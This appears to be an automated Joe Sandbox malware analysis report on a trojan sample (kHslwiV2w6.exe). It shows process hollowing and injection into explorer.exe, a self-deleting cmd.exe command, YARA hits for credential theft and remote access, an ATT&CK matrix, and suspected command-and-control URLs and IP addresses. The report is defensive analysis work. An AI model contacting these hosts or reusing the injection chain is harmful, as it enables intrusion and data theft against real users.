          Source: C:\Windows\SysWOW64\raserver.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Thread register set: target process: 4828
          Source: C:\Windows\SysWOW64\raserver.exe Thread register set: target process: 4828
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\kHslwiV2w6.exe Section unmapped: C:\Program Files (x86)\Internet Explorer\iexplore.exe base address: 400000
          Source: C:\Users\user\Desktop\kHslwiV2w6.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base address: 400000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: D10000
          Source: C:\Users\user\Desktop\kHslwiV2w6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000
          Source: C:\Users\user\Desktop\kHslwiV2w6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 401000
          Source: C:\Users\user\Desktop\kHslwiV2w6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 5429008
          Source: C:\Users\user\Desktop\kHslwiV2w6.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
          Source: C:\Users\user\Desktop\kHslwiV2w6.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
          Source: C:\Windows\SysWOW64\raserver.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 5_2_00D1C9F6 AllocateAndInitializeSid,GetLastError,AllocateAndInitializeSid,GetLastError,GetLengthSid,GetProcessHeap,HeapAlloc,InitializeAcl,GetLastError,AddAccessAllowedAce,GetLastError,AddAccessAllowedAce,GetLastError,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,AllocateAndInitializeSid,GetLastError,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,IsValidSecurityDescriptor,GetLastError,GetProcessHeap,HeapFree,FreeSid,FreeSid,FreeSid
          Source: explorer.exe, 00000004.00000002.11881693560.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.6843158548.0000000000F60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000002.11884668589.0000000004590000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11890837892.000000000CF26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11881693560.0000000000F60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.11881693560.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.6843158548.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.11880835641.0000000000820000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.11881693560.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.6843158548.0000000000F60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\kHslwiV2w6.exe Code function: GetLocaleInfoEx,0_2_00007FF72F638FB0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exe Code function: GetLocaleInfoEx,0_2_00007FF72F639080
          Source: C:\Users\user\Desktop\kHslwiV2w6.exe Code function: 0_2_00007FF72F5B0030 GetSystemTimeAsFileTime

          Stealing of Sensitive Information

          Source: Yara match File source: 3.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 3.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.kHslwiV2w6.exe.1ed0971ad88.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.kHslwiV2w6.exe.1ed0958d6f0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match File source: 3.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 3.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.kHslwiV2w6.exe.1ed0971ad88.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.kHslwiV2w6.exe.1ed0958d6f0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
          |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
          | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Access Token Manipulation | 3 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | 1 Data Encrypted for Impact |
          | Credentials | Domains | Default Accounts | 2 Native API | Boot or Logon Initialization Scripts | 812 Process Injection | 1 Access Token Manipulation | LSASS Memory | 131 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
          | Email Addresses | DNS Server | Domain Accounts | 1 Shared Modules | Logon Script (Windows) | 1 DLL Side-Loading | 812 Process Injection | Security Account Manager | 3 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
          | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction |
          | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
          | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
          | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |

          [Behavior graph: ID 1529053, Sample: kHslwiV2w6.exe, Startdate: 08/10/2024, Architecture: WINDOWS, Score: 100. Process chain: kHslwiV2w6.exe started csc.exe, conhost.exe and iexplore.exe; csc.exe injected explorer.exe; explorer.exe started raserver.exe; raserver.exe started cmd.exe; cmd.exe started conhost.exe.]

          | Source | Detection | Scanner | Label | Link |
          |---|---|---|---|---|
          | kHslwiV2w6.exe | 47% | ReversingLabs | Win64.Trojan.XWorm | |
          No Antivirus matches
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          Name | Malicious | Antivirus Detection | Reputation
          Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                            unknown
                                                                                            http://www.z8ggd.com/md02/www.qqkartel88v1.comexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvWexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://www.msn.com/en-us/money/markets?id=a3oxnmexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://www.chiri.latReferer:explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://android.notify.windows.com/iOSPexplorer.exe, 00000004.00000003.8285449351.0000000010BEC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6858022237.0000000010BA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287825721.0000000010C9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11897707281.0000000010C91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286577674.0000000010C83000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000004.00000002.11890837892.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6852064723.000000000CE47000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://www.hecxion.xyz/md02/www.woby.xyzexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://www.j3k7n.xyzexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://www.z8ggd.comReferer:explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://www.attorney-services-8344642.zoneexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://www.webuyandsellpa.comexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://www.rakring.comReferer:explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvW-darkexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.pngexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://excel.office.comexplorer.exe, 00000004.00000003.8623027004.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11896448781.0000000010A85000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286306641.0000000010A43000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6857495261.0000000010A43000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://www.attorney-services-8344642.zone/md02/www.yeslabs.xyzexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Stock_Inexplorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://www.msn.com/en-us/channel/source/AZ%20Animals%20US/sr-vid-7etr9q8xun6k6508c3nufaum0de3dqktiqexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://www.rslotrank.win/md02/www.hecxion.xyzexplorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://www.webuyandsellpa.com/md02/explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://www.piedge-taiko.netReferer:explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://www.msn.com/en-us/news/crime/dick-van-dyke-forever-young/ar-AA1lDpRDexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://www.coinbureau.xyz/md02/explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://www.localhomeservicesadvisor.comReferer:explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://ns.advexplorer.exe, 00000004.00000002.11883777705.000000000441B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6844442459.000000000441B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://www.piedge-taiko.netexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://www.rslotrank.winReferer:explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://www.pittsparking.comReferer:explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://www.woby.xyzReferer:explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://www.msn.com/en-us/news/us/trump-repeats-false-claims-that-children-are-undergoing-transgendeexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://www.equipoleiremnacional.comexplorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://www.pittsparking.com/md02/www.hecxion.xyzexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://wns.windows.com/explorer.exe, 00000004.00000003.8285449351.0000000010BEC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6858022237.0000000010BA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287825721.0000000010C9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11897707281.0000000010C91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286577674.0000000010C83000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://www.tigajco69.funexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3-darkexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://www.webuyandsellpa.com/md02/?all=e9dCEAefob0qfIp2qzYjc8hnpuRDR3iBtFDetlkNhl3JkGKef1d6ICtGRMuexplorer.exe, 00000004.00000002.11899785830.000000001444F000.00000004.80000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11883241933.0000000005A3F000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#kHslwiV2w6.exefalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://www.hecxion.xyzReferer:explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          http://www.localhomeservicesadvisor.comexplorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://www.msn.com/en-us/weather/forecast/in-Santa-Clara%2CCalifornia?loc=eyJsIjoiU2FudGEgQ2xhcmEiLexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              http://www.webuyandsellpa.com/md02/www.coinbureau.xyzexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://www.msn.com/en-us/money/markets?id=a6qja2explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://www.msn.com/en-us/tv/news/the-bold-the-beautiful-young-and-the-restless-more-get-premiere-daexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.18.188.223 | ssl1.prod.systemdragon.com | United States | 13335 | CLOUDFLARENETUS | true
198.185.159.144 | ext-sq.squarespace.com | United States | 53831 | SQUARESPACEUS | true
172.67.143.211 | www.tigajco69.fun | United States | 13335 | CLOUDFLARENETUS | true
172.66.0.70 | andrewghita.com | United States | 13335 | CLOUDFLARENETUS | true
52.206.163.162 | proxy-ssl-geo.webflow.com | United States | 14618 | AMAZON-AESUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1529053
Start date and time: 2024-10-08 15:59:21 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 17m 49s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: kHslwiV2w6.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@385/0@23/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 70%
• Number of executed functions: 64
• Number of non-executed functions: 260
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: kHslwiV2w6.exe
Time | Type | Description
10:02:17 | API Interceptor | 15112266x Sleep call for process: raserver.exe modified
10:02:25 | API Interceptor | 18365249x Sleep call for process: explorer.exe modified
                                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                104.18.188.223order-payment094093.exeGet hashmaliciousFormBook, PureLog StealerBrowse
